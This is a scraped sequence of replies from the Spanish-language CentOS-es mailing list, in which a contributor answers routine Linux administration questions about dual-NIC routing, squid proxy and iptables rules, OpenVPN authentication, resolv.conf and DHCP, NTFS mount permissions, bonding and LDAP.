09:24, Antonio Manogué Saiz a écrit : | | Buenos días. | | Tengo un problema que nunca me había pasado y con el que llevo un | tiempo bloqueado. | | En un sistema (virtualizado con VMWare) CentOS6.3 tengo 1 tarjeta de | red funcionando
Re: [CentOS-es] Probelma con 2 tarjeta de red en CentOS6.3
Hola de nuevo, Le 20/03/2013 12:47, Antonio Manogué Saiz a écrit : También voy entre líneas. Un saludo, Antonio MANOGUE - Mensaje original - | De: Francesc Guitart francesc.guit...@enise.fr | Para: centos-es@centos.org | Enviados: Miércoles, 20 de Marzo 2013 12:05:18 | Asunto: Re: [CentOS-es] Probelma con 2 tarjeta de red en CentOS6.3 | Respondo entre lineas | | | Le 20/03/2013 10:19, Antonio Manogué Saiz a écrit : | Iptables está desactivado en esta máquina. | | [root@lorentz ~]# iptables -L | Chain INPUT (policy ACCEPT) | target prot opt source destination | | Chain FORWARD (policy ACCEPT) | target prot opt source destination | | Chain OUTPUT (policy ACCEPT) | target prot opt source destination | | | Solo eth1 | [root@lorentz ~]# route -en | Kernel IP routing table | Destination Gateway Genmask Flags MSS Window irtt Iface | 10.20.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 | 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 | 0.0.0.0 10.20.1.12 0.0.0.0 UG 0 0 0 eth1 | | [root@lorentz ~]# ifconfig -a | eth1 Link encap:Ethernet HWaddr 00:50:56:8A:D0:3C | inet addr:10.20.2.24 Bcast:10.20.255.255 Mask:255.255.0.0 | inet6 addr: fe80::250:56ff:fe8a:d03c/64 Scope:Link | UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | RX packets:385431 errors:0 dropped:0 overruns:0 frame:0 | TX packets:16148 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:1000 | RX bytes:37555994 (35.8 MiB) TX bytes:1949316 (1.8 MiB) | | eth3 Link encap:Ethernet HWaddr 00:50:56:8A:45:DE | BROADCAST MULTICAST MTU:1500 Metric:1 | RX packets:6421 errors:0 dropped:0 overruns:0 frame:0 | TX packets:294 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:1000 | RX bytes:646119 (630.9 KiB) TX bytes:49064 (47.9 KiB) | | lo Link encap:Local Loopback | inet addr:127.0.0.1 Mask:255.0.0.0 | inet6 addr: ::1/128 Scope:Host | UP LOOPBACK RUNNING MTU:16436 Metric:1 | RX packets:0 errors:0 dropped:0 overruns:0 frame:0 | TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:0 | RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) | | | Después de ifup eth3 | | [root@lorentz ~]# route -en | Kernel IP routing table | Destination Gateway Genmask Flags MSS Window irtt Iface | 10.1.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth3 | 10.20.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 | 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 | 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth3 | 0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 eth3 | | Cual es la red 169.254.0.0? Y porqué es accesible desde las dos | ethernet | y con la misma métrica? Esa es la red DHCP que se asigna cuando no se puede conectar con un servidor DHCP. En alguna de las pruenas dejé eth3 en dhcp por probar. Ha debido dejar restos de esas pruebas. | | [root@lorentz ~]# ifconfig -a | eth1 Link encap:Ethernet HWaddr 00:50:56:8A:D0:3C | inet addr:10.20.2.24 Bcast:10.20.255.255 Mask:255.255.0.0 | inet6 addr: fe80::250:56ff:fe8a:d03c/64 Scope:Link | UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | RX packets:388473 errors:0 dropped:0 overruns:0 frame:0 | TX packets:16181 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:1000 | RX bytes:37870282 (36.1 MiB) TX bytes:1954442 (1.8 MiB) | | eth3 Link encap:Ethernet HWaddr 00:50:56:8A:45:DE | inet addr:10.1.10.68 Bcast:10.1.255.255 Mask:255.255.0.0 | inet6 addr: fe80::250:56ff:fe8a:45de/64 Scope:Link | UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 | RX packets:1558 errors:0 dropped:0 overruns:0 frame:0 | TX packets:128 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:1000 | RX bytes:156719 (153.0 KiB) TX bytes:15965 (15.5 KiB) | | lo Link encap:Local Loopback | inet addr:127.0.0.1 Mask:255.0.0.0 | inet6 addr: ::1/128 Scope:Host | UP LOOPBACK RUNNING MTU:16436 Metric:1 | RX packets:0 errors:0 dropped:0 overruns:0 frame:0 | TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 | collisions:0 txqueuelen:0 | RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) | | | Si que apunta a problemas con GW. | | Exactamente. | | Como constatas que se pierde la conexión en eth1? Haces ping desde | otra | maquina a eth1 o haces ping desde este servidor a una red que es | accesible a través de eth1? Que rangos de IP usan estas redes que no | son | accesibles por eth1? Lo compruebo haciendo ping desde una 10.1.10.X/16 y desde una 10.1.2.X/16 . En efecto lo que pasa es que se pierde el tráfico de la eth1 y
Re: [CentOS-es] Bloquear Facebook https
Hola Le 15/03/2013 07:56, Tranc3 Music a écrit : El 14/03/13, Ing. Ernesto Pérez cen...@ecualinux.com escribió: On 03/14/2013 01:38 PM, Getzan Ávila wrote: Buenas tardes, He intentando bloquear el ingreso a Facebook por https con el shorewall sin lograrlo. Me podrían ayudar hace un tiempo le hice así, y me funcionó.. en centos-6 http://www.ecualug.org/?q=2012/05/23/comos/centos6_%C2%BFc%C3%B3mo_bloquear_facebook_con_iptables Hola Ernesto, tengo una pregunta: en la regla del how to qué significa --algo bm, por favor me daría una idea? saludos. man iptables: --algo {bm|kmp} Select the pattern matching strategy. (bm = Boyer-Moore, kmp = Knuth-Pratt-Morris) ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Consulta Proxy Firewall
Hola Le 25/02/2013 18:06, César Martinez a écrit : Hola amigos esperando que se encuentren bien a continuación paso a explicar mi problema haber si me pueden echar una mano. Tengo un servidor centos 5.9 funcionando como proxy uso squid de forma transparente para una red de 10 máquinas ubicadas en un piso, adicional uso dhcp para generar ips fijas a cada equipo con su macadress, existen 5 máquinas que estan en otra ciudad, para comunicarse entre estas dos ubicaciones hay un tunel de datos implementado por el mismo proveedor de internet, el segmento de red que se usa en la ubicación principal es 192.168.0.X y en la sucursal usa 192.168.1.X, tengo ingresadas las rutas para que se puedan ver las máquinas se hacen ping y todo funciona bien, ahora deseo que a través de este tunel se pueda dar internet desde la matriz a la sucursal y por ende restringir a las máquinas de la red 192.168.1.X. Aquí las preguntas 1.- Debo cambiar algo en al primera linea de mi proxy que es http_port 192.168.0.1:3128 transparent, de tal forma que la red 192.168.1.X pueda funcionar No soy un experto en squid pero creo que esta linea establece cual es la interface y cual es el puerto de escucha del proxy. Es decir nada que ver con las redes permitidas. Buscando en internet veo que lo que necesitas se hace con ACL. Algo asi como/ # # Add this to the bottom of the ACL section of squid.conf # acl home_network src 192.168.1.0/255.255.255.0 # # Add this at the top of the http_access section of squid.conf # http_access allow home_network 2.- Que reglas adicionales de fowarad o nat debo aplicar en mis reglas del firewall que funcione el internet en las máquinas 192.168.1X Eso depende de como este configurado el firewall. Si tienes algo como esto no hara falta: iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128 iptables -A INPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -i eth1 -p tcp --dport 3128 iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o eth0 -p tcp --dport 80 iptables -A INPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -i eth0 -p tcp --sport 80 iptables -A OUTPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -o eth1 -p tcp --sport 80 Gracias a todos los que puedan echarme una mano o guia de como resolver este problema Aqui tienes una web de donde he sacado la informacion que es muy didactica: http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch32_:_Controlling_Web_Access_with_Squid#.USyOQMxLv3w -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Modos de Openvpn
Hola, Le 21/02/2013 19:42, Rodrigo Pichiñual Norin a écrit : Que tal: Instale OpenVpn en Centos...todo bien Pero existe 2 modos de conexión mediante llave estática y mediante certificados TLS SSL La pregunta es cual es mas conveniente Llave estática es un password. Para conectarse a la VPN los usuarios deberán introducir una contraseña. Mediante certificados, como su nombre indica, no usará una contraseña sino una infraestructura de llave publica. Es decir, certificados de usuario (para identificar usuarios) o de ordenador (para autentificar una maquina). Si se conectan muchos usuarios a la VPN la opción mediante certificados es mas costosa de mantener (crear un autoridad de certificación para crear los certificados para cada usuarios o maquina, distribuirlos y cada cierto tiempo renovarlos para volver a distribuirlos). En teoría es mas segura que un simple password aunque la clave privada del certificado también puede ser robada. El método password es mas fácil de implementar, ademas seguramente ya tendrás un LDAP de donde sacar los passwords de los usuarios. Eso si, la política de seguridad de los passwords debe ser fuerte (obligación de usar mayúsculas, minúsculas, números y caracteres especiales y también que cambien cada cierto tiempo) si no quieres poner en riesgo la seguridad de tu red. Gracias. De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Particionar MY PASS 2TB
Le 03/02/2013 18:05, Fidel Dominguez a écrit : Quisiera saber cual seria la mejor option de particionar mi MY PASS 2TB? Quisiera sus consejos al respecto, si es mejor dejarlo tal y como esta o cambiarle el formato a ext3? O crear dos particiones para su mejor rendimiento? Necesito consejos Si vas a usarlo siempre en Linux usa una sola particion ext4. Si ocasionalmente quieres conectarlo a un Windows puedes instalar software como Ext2Read: http://sourceforge.net/projects/ext2read/ ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Error al iniciar en resolv.con
Le 06/11/2012 19:47, Fidel Dominguez a écrit : Amigos me pasa lo siguiente, cuando inicio a pc en el fichero resolv.conf veo lo siguiente: ; generated by /sbin/dhclient-script search gateway.2wire.net ## y mas lineas diciendo que especifique los dns Lo que trae como resultado esto es que cuando ejecuto yum update no se conecta a los servidores, entonces me fijo q en /etc/sysconfig/network-scripts/ifcfg-eth0 tengo lo siguiente: DEVICE=eth0 BOOTPROTO=dhcp HWADDR=00:0d:56:5f:49:d5 NM_CONTROLLED=no ONBOOT=yes TYPE=Ethernet UUID=c6c7615a-9024-4aa1-bfdf-59b6456b39df DNS1=68.94.156.1 IPV6INIT=no USERCTL=no DNS2=68.94.157.1 PEERDNS=yes Al parecer aqui todo esta bien. Entonces solo logro resolver el problema del resolv.conf reiniciando la red (service netowrk restart) y entonces despues de esto en resolv.conf aparece de esta forma: ; generated by /sbin/dhclient-script search gateway.2wire.net valerofix.com nameserver 68.94.156.1 nameserver 68.94.157.1 Alguna idea de que es lo q me esta pasando. Esta pc es un DNS local, no se si el named.conf influira en esto. He tratado de cambiar a static en vez de dhcp en el fichero ifcfg-eth0, pero como resultado despues no me inicia nada, porque el router que tengo me da la ip por dhcp, Lo unico que pude hacer en el router fue decirle que me de siempre la misma ip. Alguna idea, o sugerencia al respecto 3 cosas : Después de reiniciar el ordenador copia la salida de estos comandos: ifconfig -a netstat -arn cat resolv.conf Después de reiniciar el ordenador y antes de reiniciar la red intenta comunicar con el servidor DHCP haciendo: dhclient eth0 y después haz : ifconfig -a netstat -arn cat resolv.conf Finalmente reinicia la red y haz : ifconfig -a netstat -arn cat resolv.conf Envía todas las salidas de todos los comandos para ver que esta pasando. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor de correo Postfix
Le 03/11/2012 23:15, Fidel Dominguez a écrit : Hola amigos Estaba siguiendo el manuel de alcance libre para montar un servidor de correo postfix, pero me quedan algunas dudas que quisiera aclarar. En el manual explican muy bien la configuracion pero la parte de alte de cuentas de usuario no la mensionan, se que los usuarios que se creen en el server de correo van a poder acceder al correo. Quisiera saber si se puede cambiar el passwd de los usuarios via web, para que los mismos usuarios cambien sus contrasenas cuando lo deseen. El otro punto es que no veo la opcion de squirrelmail, o ya este quedo a la historia y hay otra opcion mas facil o ventajosa. Cualquier aclaracion, manual, o referencia sera agradecida Exactamente que manual estas siguiendo? La manera de permitir cambiar el password a los clientes dependerá de la configuración de tu servidor de correo. SquirrelMail funciona muy bien pero ha quedado un poco anticuado. Te recomiendo RoundCube u Horde. -- Francesc Guitart Service CRI ENISE ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] chattr -V -R +i
Le 13/10/2012 22:51, Mario Villela Larraza a écrit : hola otra ves recurriendo a ustedes Hola mi problema es lago sencillo como dice en el sujete de este mail quiero hacer precisamente eso proteger de escritura archivos que pretendo poner en un USB pero esta instruccion solo sirve en particiones con formato ext4 3 y 4 y necesito que los archivos se vean en maquinas windows y mac. Para leer un USB en Mac y en Windows o escoges un filesystem FAT o NTFS. Pero no todo iba a ser tan fácil. El problema es que FAT no implementa permisos en los ficheros. NTFS sí lo hace pero solo si estás en Windows, es decir, un Linux no será capaz de leer esos permisos para aplicarlos. alguna idea de como hacer esto??? de antemano muchas gracias La única solución que tienes son las opciones uid, gid y umask cuando montas un volumen FAT o NTFS. Esto te permitirá montar el USB con derechos de escritura para el propietario (tu) y derechos de lectura para el grupo y otros. Seria algo como: mount -t ntfs-3g -o uid=1000,gid=1000,umask=022 /dev/sdc1 /mnt/usb Si escoges FAT también tienes dmask (para directorios) y fmask (para ficheros) ademas de umask. -- Francesc ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Bonding + Balancing + DHCP CentOS6
Hola Le 14/10/2012 02:33, Virgilio Schuverer a écrit : Muy buenas a todos, hace varios meses migre todos los servidores windows que tenia la empresa por servidores linux CentOS 6, hasta el momento todo ha funcionado bien para las diferentes aplicaciones que utilizamos, desde PBX Asterisk, DB, servidores Web, etc., primero quiero felicitar y agradecer a todas las personas que han aportado para poder alcanzar un OS tan robusto, estoy muy satisfecho con su estabilidad y sobre todo su alto desempeño que hasta la fecha hemos tenido. Tengo una *consulta* haber si alguien puede ayudarme con el código adecuado para poder lograr la integración correcta en la configuración de cuatro (4) tarjetas de red de 100MB y dos proveedores ISP con IP publica realizando un Ethernet bonding, la idea es 1. *repartir las cargas*, *2. combinan **la redundancia* y *3. fusionar el ancho de banda de ambos proveedores ISP*para lograr un mayor incremento, por ultimo configurar el archivo dhcpd.conf y que los usuarios de dicha red puedan solicitar una ip y poder gozar de los beneficios antes mencionados. El punto 1 y 2, ya esta en producción funcionando correctamente y ya fue probado en el lab, El problema lo tengo en el punto 3, llevo varios días buscando en google y foros y no logro encontrar ninguna información concreta sobre este tema en especifico.(*fusionar el ancho de banda de 2 ó mas proveedores ISP* o mejor dicho de las interfaces bond0 y bond1), pare que si uno deja de enviar o recibir paquetes otro siga funcionando normalmente y los usuarios de la red no pierdan conectividad. [...] Estás seguro que lo que quieres hacer es posible? No he usado nunca bonding pero me parece que no. Si te he entendido bien quieres, por ejemplo, que cuando descargues un fichero una mitad vaya por eth0 y la otra mitad por eth1. Así consigues el doble de velocidad y si cae eth0 la descarga continua mas lentamente por eth1. Cuando haces una petición a un servidor, el paquete IP que envías tiene una dirección origen y una dirección destino. El servidor que recibe la petición responde solo a una IP, la IP de origen del paquete que hizo la solicitud. Lo que sí puedes conseguir con bonding es descargar dos ficheros a la vez y que cada uno te llegue por una ADSL distinta. En este caso la petición de descarga del fichero 1 habrá salido por eth0 y la petición de descarga del fichero 2 habrá salido por eth1. Entonces sí tendrás la suma del ancho de banda de las dos ADSL. Espero haberme explicado. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Usuarios duplicados openldap
Le 04/10/2012 15:58, Azu Carlitox a écrit : Hola, tengo el siguiente problema. Cuando creo usuarios en openldap, si los creo en diferentes OU, me permite crear usuarios con el mismo cn. Esto me trae una dificultad, ya que las OU la utilizo para distinguir usuarios de oficinas. Alguno sabe que tengo que configurar para que me chequee que no exista el mismo cn en las OU al momento de crear un usuario? Gracias y salu2 ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es Google dice que LDAP no soporta campos únicos salvo para el DN (DistinguishedName) Pero luego buscando un poco mas veo esto: http://linux.die.net/man/5/slapo-unique Y parece que sí. Investiga por ahí. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] No encuentra archivo
Le 28/09/2012 14:34, Fermin Francisco a écrit : Buenos días!! Estoy editando el archivo /etc/named.conf para incluir en la última línea un archivo donde tengo configurada una zona, pero cuando reinicio el servicio named me dice q no encuentra el archivo. Esto es lo q pongo al final del archivo: include /etc/named.conf.local; Y el error es el siguiente: /etc/named.conf:45 /etc/named.conf.local file not found [failed] No controlo mucho BIND pero parece que esto está bien configurado. Como hago para que el archivo /etc/named.conf utilice este archivo o algún otro?? Puedes enviar la salida de ls -l /etc/named*? -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Como instalar big blug button en centos 6
De su página web: http://code.google.com/p/bigbluebutto/wiki/InstallingBigBlueButtonCentOS Es un poco antiguo pero quizá te servirá para orientarte. Mas info: http://code.google.com/p/bigbluebutton/wiki/TableOfContents?tm=6 Le 26/09/2012 10:41, Jimmy Bersoza a écrit : Hola, soy estudiante de sistemas y tengo que instalar big blug button en centos 6 pero no en cuentro informacion que me guie tal vez ustedes me puede ayudar con un gui de como instalarlo Atte. Jimmy BersozaBCSISTEMPágina web: www.bcsistem.mex.tl Celular: 091709267 (Claro)Skype: jimmy_bersozaPasaje - El Oro- Ecuador ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es